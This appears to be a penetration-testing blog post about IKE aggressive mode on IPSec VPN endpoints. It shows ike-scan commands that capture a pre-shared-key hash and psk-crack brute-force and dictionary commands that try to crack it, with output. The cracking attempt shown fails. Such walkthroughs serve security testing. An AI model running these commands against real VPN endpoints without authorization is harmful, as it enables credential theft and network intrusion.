IPSEC Internet Key Exchange (IKE)


The remote host seems to be enabled to do Internet Key Exchange (IKE). This is typically indicative of a VPN server. VPN servers are used to connect remote hosts into internal resources.

Make sure that the use of this VPN endpoint is done in accordance with your corporate security policy.

Note that if the remote host is not configured to allow the Nessus host to perform IKE/IPSEC negotiations, Nessus won’t be able to detect the IKE service.

Also note that this plugin does not run over IPv6.


If this service is not needed, disable it or filter incoming traffic to this port.

Ok so exactly how can we test this, or even compromise this?

Well, firstly we must scan the host to check if the vpn host has aggressive mode enabled.

 IKE-SCAN is installed by default on Backtrack  or Kali OS

$ ike-scan -A

Starting ike-scan 1.9 with 1 hosts

Aggressive Mode Handshake returned HDR=(CKY-R=f320d6*******)
SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=12f5f28c*********** (Cisco Unity)
VID=afcad71368a1***********(Dead Peer Detection v1.0)
VID=090026************ (XAUTH)
KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value= Nonce(20 bytes) Hash(16 bytes)
The above shows the returned handshake.
So lets run it again but this time saving the key to output.

 $ ike-scan -A –id=myid -P192-168-207-134key

Now we have the key. lets crack it!
We will use PSK-CRACK:

Brute force:
$psk-crack -b 5 192-168-207-134
key Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations
no match found for MD5 hash 5c178d*****
Ending psk-crack: 60466176 iterations in 138.019 seconds

Default is charset is “0123456789abcdefghijklmnopqrstuvwxyz” can be changed with –charset=

$ psk-crack -b 5 –charset=”01233456789ABCDEFGHIJK” 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

Dictionary attack:
$psk-crack -d /path/to/dictionary 192-168-207-134
key Running in dictionary cracking mode
no match found for MD5 hash 5c178d*****
Ending psk-crack: 14344876 iterations in 33.400 seconds

As you can see this key is long and complex and we are unable to get the plain text password. Win for the sys admins here.

You will see your password in the results in plain text if you happen to crack the password with this method


Popular posts from this blog

Null Session Domain Controller Enumeration

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution

NetBIOS / NBNS Spoofing